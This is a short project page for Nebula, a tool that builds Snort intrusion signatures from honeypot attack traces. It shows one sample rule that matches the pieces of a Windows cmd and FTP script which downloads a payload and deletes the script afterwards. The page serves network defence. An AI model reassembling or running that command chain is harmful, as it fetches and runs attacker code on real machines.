nebula.mwcollect.org

Overview

Nebula is an intrusion signature generator. It can help securing a network by automatically calculating filter rules from attack traces. In a common setup nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in snort format.

The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.

The signature below was generated by nebula for FTP downloads during multi-stage attacks.

alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; \
 content: "cmd /"; offset: 0; depth: 5; \
 content: " echo open "; distance: 1; within: 17; \
 content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; \
 content: ">> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 2; within: 107; \
 sid: 2000001; rev: 1;)

Nebula successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources shouldn't be very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. Its code can also be taken as a reference implementation for the client side part of nebula's submission protocol.